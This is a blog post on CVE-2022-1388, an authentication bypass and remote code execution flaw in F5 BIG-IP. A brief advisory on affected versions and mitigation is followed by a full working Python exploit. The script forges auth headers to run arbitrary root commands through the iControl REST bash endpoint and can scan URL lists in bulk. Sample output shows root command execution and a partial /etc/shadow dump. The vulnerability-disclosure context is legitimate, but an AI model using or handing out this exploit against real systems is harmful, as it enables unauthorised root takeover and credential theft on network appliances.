Diniz Martins
May 9, 20222 min
A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of users to remote control.
The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl's REST authentication.
If exploited, an unauthenticated user could get remote code execution (RCE) on an affected device. 👽
Affected Devices
Everything older than version 17. Patches are available for BIG-IP versions 13-16. BIG-IP version 11 and 12 are vulnerable with no available patch.
So what should you do?
Usually, I recommend patching first and later attending to the configuration issues. But in this case, I will swap this order: First, make sure you are not exposing the admin interface. If you can't manage that: Don't try patching. Turn off the device instead. If the configuration interface is safe: Patch!
â–“ CVE-2022-1388.py:
import os
 import sys
 import argparse
 import urllib3
 import requests
 urllib3.disable_warnings()
Â
Â
 headers = {
 "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
 "Content-type": "application/json",
 "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
 "X-F5-Auth-Token": "anything",
 "Authorization": "Basic YWRtaW46"}
Â
 endpoint = "/mgmt/tm/util/bash"
Â
 def usage():
 print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1")
 print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
 print(" python3 CVE-2022-1388.py -f urls.txt")
Â
 def poc(url):
 payload = {"command": "run", "utilCmdArgs": "-c id"}
 try:
 res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
 if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
 print("[+] {} is vulnerable!!!".format(url))
 return True
 else:
 print("[-] {} is not vulnerable.".format(url))
 return False
 except Exception as e:
 print("[-] {} Exception: ".format(url) + e)
 pass
Â
 def exp(url, command):
 payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
 try:
 res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
 if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
 print(res.json()['commandResult'])
 return True
 else:
 print("[-] {} is not vulnerable.".format(url))
 return False
 except Exception as e:
 print("[-] {} Exception: ".format(url) + e)
 pass
Â
 if __name__ == '__main__':
 parser = argparse.ArgumentParser(
 description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
 parser.add_argument('-u', '--url', type=str,
 help="vulnerability verification for individual websites")
 parser.add_argument('-c', '--command', type=str,
 help="command execution")
 parser.add_argument('-f', '--file', type=str,
 help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
 args = parser.parse_args()
 if len(sys.argv) == 3:
 if sys.argv[1] in ['-u', '--url']:
 poc(args.url)
 elif sys.argv[1] in ['-f', '--file']:
 if os.path.isfile(args.file) == True:
 with open(args.file) as target:
 urls = []
 urls = target.read().splitlines()
 for url in urls:
 if poc(url) == True:
 with open("success.txt", "a+") as f:
 f.write(url + "\n")
 elif len(sys.argv) == 5:
 if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
 exp(args.url, args.command)
 else:
 parser.print_help()
 usage()
â–“ Outputs:
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address>
 [+] https://<ip-address> is vulnerable!!!
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'id'
 uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'cat /etc/shadow'
 ...
 root:$6$TMuNP0xxxxxxxx
 admin:$6$83fzG1vk$7wpUV.vkxxxxxx
 ...
⇡ sha512—Produces a 512-bit digest. The encrypted password starts with $6$.
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'tmsh show sys hardware'
Â
 Sys::Hardware
 Chassis Information
 Maximum MAC Count 1
 Registration Key -
Â
 Hardware Version Information
 Name cpus
 Type base-board
 Model Intel Xeon Processor (Skylake, IBRS)
 Parameters -- --
 cache size 4096 KB
 cores 24 (physical:24)
 cpu MHz 2194.838
 cpu sockets 24
 cpu stepping 4
Â
Â
 Platform
 Name BIG-IP Virtual Edition
 BIOS Revision
 Base MAC 52:54:00:xx:55:ba
 Hypervisor KVM
 Cloud
Â
 System Information
 Type Z100
 Chassis Serial 191931f7-0dcb-4d7c-45xe
 Level 200/400 Part
 Switchboard Serial
 Switchboard Part Revision
 Host Board Serial
 Host Board Part Revision